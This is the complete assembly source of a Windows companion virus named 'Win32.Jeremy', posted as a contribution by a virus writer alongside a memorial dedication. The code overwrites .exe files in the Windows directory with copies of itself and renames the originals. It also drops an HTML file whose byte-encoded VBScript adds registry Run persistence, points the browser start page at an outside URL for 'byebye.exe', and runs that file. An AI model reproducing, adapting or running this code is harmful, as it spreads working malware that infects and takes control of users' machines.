Contribution - Win32.Jeremy [by Necronomikon] ;******************************** ;******** Win32.Jeremy ********** ;(c)by Necronomikon /ZeroGravity ;******************************** ;Written for one of my real friends who,died through an car accident..... :( ; ;In memories for: ;----------------- ;Jeremy Stephan Garcia ;* 17.05.1984 ;+ 08.04.2004 .586p .model flat JUMPS .data handle1 db 50 dup(0) handle2 db 50 dup(0) maska db '*.exe',0 zgrext db 'dat.',0 handle_ dd 0 _handle dd 0 filedta: FileAttributes dd 0 CreationTime db 8 dup(0) LastAccessTime db 8 dup(0) LastWriteTime db 8 dup(0) nFileSizeHigh dd 0 nFileSizeLow dd 0 dwReserved0 dd 0 dwReserved1 dd 0 nFileName db 50 dup('N') nAltFileName db 14 dup(0) newfilename db 50 dup(0) path2 db 25 dup(0) path3 db 260 dup(0) szTitle db "*** Win32.Jeremy ***",0 szMessage db "*****************************************************************************",13,10 db "**Written for one of my friends,who died through an car accident**",13,10 db "*****************************************************************************",13,10 db "** (c) by Necronomikon / ZeroGravity **",13,10 db "*****************************************************************************",0 ;dropme htm_handle dd ? htmdropper db '\jeremy.htm', 0 szhtm db 220 dup (0) htm_ db 60,104,116,109,108,62,13,10,13,10,60,98,111,100,121,32 db 98,103,99,111,108,111,114,61,34,98,108,97,99,107,34,32 db 108,105,110,107,61,34,35,48,48,48,48,48,48,34,32,118 db 108,105,110,107,61,34,35,48,48,48,48,48,48,34,32,97 db 108,105,110,107,61,34,35,102,102,48,48,48,48,34,32,116 db 101,120,116,61,108,105,109,101,62,13,10,60,99,101,110,116 db 101,114,62,13,10,60,98,114,62,13,10,60,102,111,110,116 db 32,115,105,122,101,61,43,50,62,60,117,62,60,98,62,60 db 102,111,110,116,32,99,111,108,111,114,61,34,35,48,48,56 db 48,70,70,34,62,87,60,47,102,111,110,116,62,60,102,111 db 110,116,32,99,111,108,111,114,61,34,35,48,48,56,67,69 db 56,34,62,105,60,47,102,111,110,116,62,60,102,111,110,116 db 32,99,111,108,111,114,61,34,35,48,48,57,55,68,49,34 db 62,110,60,47,102,111,110,116,62,60,102,111,110,116,32,99 db 111,108,111,114,61,34,35,48,48,65,51,66,57,34,62,51 db 60,47,102,111,110,116,62,60,102,111,110,116,32,99,111,108 db 111,114,61,34,35,48,48,65,69,65,50,34,62,50,60,47 db 102,111,110,116,62,60,102,111,110,116,32,99,111,108,111,114 db 61,34,35,48,48,66,65,56,66,34,62,46,60,47,102,111 db 110,116,62,60,102,111,110,116,32,99,111,108,111,114,61,34 db 35,48,48,67,53,55,52,34,62,74,60,47,102,111,110,116 db 62,60,102,111,110,116,32,99,111,108,111,114,61,34,35,48 db 48,68,49,53,68,34,62,101,60,47,102,111,110,116,62,60 db 102,111,110,116,32,99,111,108,111,114,61,34,35,48,48,68 db 67,52,54,34,62,114,60,47,102,111,110,116,62,60,102,111 db 110,116,32,99,111,108,111,114,61,34,35,48,48,69,56,50 db 69,34,62,101,60,47,102,111,110,116,62,60,102,111,110,116 db 32,99,111,108,111,114,61,34,35,48,48,70,51,49,55,34 db 62,109,60,47,102,111,110,116,62,60,102,111,110,116,32,99 db 111,108,111,114,61,34,35,48,48,70,70,48,48,34,62,121 db 60,47,102,111,110,116,62,60,47,102,111,110,116,62,60,47 db 117,62,60,98,114,62,60,98,114,62,60,98,114,62,13,10 db 60,116,105,116,108,101,62,46,46,46,97,110,100,32,111,110 db 99,101,32,97,103,97,105,110,32,111,110,101,32,111,102,32 db 109,121,32,112,97,108,115,46,46,46,33,63,60,47,116,105 db 116,108,101,62,13,10,60,102,111,110,116,32,115,105,122,101 db 61,45,49,32,99,111,108,111,114,61,119,104,105,116,101,62 db 43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,60 db 98,114,62,60,98,114,62,13,10,87,114,105,116,116,101,110 db 32,102,111,114,32,111,110,101,32,111,102,32,109,121,32,102 db 114,105,101,110,100,115,32,119,104,111,32,100,105,101,100,32 db 116,104,114,111,117,103,104,32,97,110,32,99,97,114,32,97 db 99,99,105,100,101,110,116,13,10,60,98,114,62,60,98,114 db 62,13,10,40,99,41,111,100,101,100,32,105,110,32,71,101 db 114,109,97,110,89,32,50,111,111,52,60,98,114,62,60,98 db 114,62,98,121,32,78,101,99,114,111,110,111,109,105,107,111 db 110,47,90,101,114,111,71,114,97,118,105,116,121,60,98,114 db 62,13,10,60,98,114,62,60,98,114,62,60,47,102,111,110 db 116,62,13,10,60,83,99,114,105,112,116,32,76,97,110,103 db 117,97,103,101,61,118,98,115,62,13,10,114,101,109,32,119 db 105,110,51,50,46,106,101,114,101,109,121,13,10,114,101,109 db 32,40,99,41,32,98,121,32,78,101,99,114,111,110,111,109 db 105,107,111,110,47,90,71,13,10,83,101,116,32,100,111,119 db 110,108,111,97,100,101,114,32,61,32,67,114,101,97,116,101 db 79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46 db 83,104,101,108,108,34,41,13,10,100,111,119,110,108,111,97 db 100,101,114,46,114,101,103,119,114,105,116,101,32,34,72,75 db 67,85,92,115,111,102,116,119,97,114,101,92,119,105,110,51 db 50,74,101,114,101,109,121,92,34,44,32,34,40,99,41,98 db 121,32,78,101,99,114,111,110,111,109,105,107,111,110,47,90 db 101,114,111,71,114,97,118,105,116,121,34,13,10,83,101,116 db 32,74,101,114,101,109,121,61,32,67,114,101,97,116,101,111 db 98,106,101,99,116,40,34,115,99,114,105,112,116,105,110,103 db 46,102,105,108,101,115,121,115,116,101,109,111,98,106,101,99 db 116,34,41,13,10,74,101,114,101,109,121,46,99,111,112,121 db 102,105,108,101,32,119,115,99,114,105,112,116,46,115,99,114 db 105,112,116,102,117,108,108,110,97,109,101,44,74,101,114,101 db 109,121,46,71,101,116,83,112,101,99,105,97,108,70,111,108 db 100,101,114,40,48,41,38,95,13,10,34,92,106,101,114,101 db 109,121,46,118,98,115,34,13,10,90,71,114,97,118,105,116 db 121,61,32,34,34,13,10,90,71,114,97,118,105,116,121,61 db 32,100,111,119,110,108,111,97,100,101,114,46,114,101,103,114 db 101,97,100,40,34,72,75,67,85,92,83,111,102,116,119,97 db 114,101,92,77,105,99,114,111,115,111,102,116,92,73,110,116 db 101,114,110,101,116,32,69,120,112,108,111,114,101,114,92,68 db 111,119,110,108,111,97,100,32,68,105,114,101,99,116,111,114 db 121,34,41,13,10,73,102,32,40,90,71,114,97,118,105,116 db 121,61,32,34,34,41,32,84,104,101,110,13,10,90,71,114 db 97,118,105,116,121,32,61,32,34,99,58,34,13,10,69,110 db 100,32,73,102,13,10,73,102,32,82,105,103,104,116,40,90 db 71,114,97,118,105,116,121,44,32,49,41,32,61,32,34,32 db 92,32,34,32,84,104,101,110,32,90,71,114,97,118,105,116 db 121,32,61,32,77,105,100,40,90,71,114,97,118,105,116,121 db 44,32,49,44,32,76,101,110,40,90,71,114,97,118,105,116 db 121,41,32,45,32,49,41,13,10,73,102,32,78,111,116,32 db 40,74,101,114,101,109,121,46,102,105,108,101,101,120,105,115 db 116,115,40,74,101,114,101,109,121,46,103,101,116,115,112,101 db 99,105,97,108,102,111,108,100,101,114,40,48,41,32,38,32 db 34,92,98,121,101,98,121,101,46,101,120,101,34,41,41,32 db 84,104,101,110,13,10,73,102,32,78,111,116,32,40,74,101 db 114,101,109,121,46,102,105,108,101,101,120,105,115,116,115,40 db 90,71,114,97,118,105,116,121,32,38,32,34,92,98,121,101 db 98,121,101,46,101,120,101,34,41,41,32,84,104,101,110,13 db 10,100,111,119,110,108,111,97,100,101,114,46,114,101,103,119 db 114,105,116,101,32,34,72,75,67,85,92,83,111,102,116,119 db 97,114,101,92,77,105,99,114,111,115,111,102,116,92,73,110 db 116,101,114,110,101,116,32,69,120,112,108,111,114,101,114,92 db 77,97,105,110,92,83,116,97,114,116,32,80,97,103,101,34 db 44,95,13,10,34,104,116,116,112,58,47,47,119,105,110,51 db 50,106,101,114,101,109,121,46,116,114,105,112,111,100,46,99 db 111,109,47,98,121,101,98,121,101,46,101,120,101,34,13,10 db 100,111,119,110,108,111,97,100,101,114,46,114,101,103,119,114 db 105,116,101,32,34,72,75,69,89,95,67,85,82,82,69,78 db 84,95,85,83,69,82,92,83,111,102,116,119,97,114,101,92 db 77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119 db 115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110 db 92,82,85,78,34,44,95,13,10,74,101,114,101,109,121,46 db 103,101,116,115,112,101,99,105,97,108,102,111,108,100,101,114 db 40,48,41,32,38,32,34,92,98,121,101,98,121,101,46,101 db 120,101,34,13,10,69,108,115,101,13,10,100,111,119,110,108 db 111,97,100,101,114,46,114,101,103,119,114,105,116,101,32,34 db 72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69 db 82,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111 db 115,111,102,116,92,73,110,116,101,114,110,101,116,32,69,120 db 112,108,111,114,101,114,92,77,97,105,110,92,83,116,97,114 db 116,32,80,97,103,101,34,44,95,13,10,34,97,98,111,117 db 116,58,98,108,97,110,107,34,13,10,74,101,114,101,109,121 db 46,99,111,112,121,102,105,108,101,32,90,71,114,97,118,105 db 116,121,32,38,32,34,92,98,121,101,98,121,101,46,101,120 db 101,34,44,95,13,10,74,101,114,101,109,121,46,103,101,116 db 115,112,101,99,105,97,108,102,111,108,100,101,114,40,48,41 db 32,38,32,34,92,98,121,101,98,121,101,46,101,120,101,34 db 13,10,100,111,119,110,108,111,97,100,101,114,46,114,117,110 db 32,74,101,114,101,109,121,46,103,101,116,115,112,101,99,105 db 97,108,102,111,108,100,101,114,40,48,41,32,38,32,34,92 db 98,121,101,98,121,101,46,101,120,101,34,44,32,49,44,32 db 70,97,108,115,101,13,10,101,110,100,32,105,102,13,10,60 db 47,115,99,114,105,112,116,62,13,10,60,47,66,79,68,89 db 62,13,10,60,47,104,116,109,108,62,13,10,13,10,0 script_size2 equ $-htm_ _off_ equ 2722d include useful.inc .code api macro a extrn a:proc call a endm jeremy: push 00000000h ; Parameters for MessageBoxA push offset szTitle push offset szMessage push 00000000h api MessageBoxA real: push 00000001 push offset nFileName api WinExec push offset path3 push 260 api GetCurrentDirectoryA push 25 push offset path2 api GetWindowsDirectoryA push offset path2 api SetCurrentDirectoryA push offset handle1 api GetModuleHandleA push 50 push offset handle2 push eax api GetModuleFileNameA push offset filedta push offset maska api FindFirstFileA mov dword ptr [handle_],eax cmp eax, 0 je @@dropfile ; <------------- check: mov bx, word ptr[nFileName] cmp bx, 'J' je nextfile cmp bx, 'E' je nextfile cmp bx, 'R' je nextfile cmp bx, 'E' je nextfile cmp bx, 'M' je nextfile cmp bx, 'Y' je nextfile lea esi, [nFileName] lea edi, [newfilename] stowit: lodsb cmp al, '.' je addext stosb jmp stowit addext: stosb lea esi, [zgrext] movsw movsw push 0 push offset newfilename push offset nFileName api MoveFileA ;api lstrcat push 0 push offset nFileName push offset handle2 api CopyFileA push 2 push offset nFileName api CreateFileA mov dword ptr [_handle],eax push dword 0 push 0 push _off_ push eax api SetFilePointer mov eax, dword ptr [_handle] push 50 push offset newfilename push eax api WriteFile push eax api _lclose jmp nextfile je real @@dropfile: push 50 push offset szhtm api GetWindowsDirectoryA push offset htmdropper push offset szhtm api lstrcat push 0 push offset szhtm api _lcreat mov [htm_handle],eax push script_size2 push offset htm_ push [htm_handle] api _lwrite push [htm_handle] api _lclose push 0 push edi api WinExec nextfile: push offset filedta mov eax, dword ptr [handle_] push eax api FindNextFileA cmp eax, 0 je @@dropfile ; <----------------- jmp check bailout: push 0 api ExitProcess end jeremy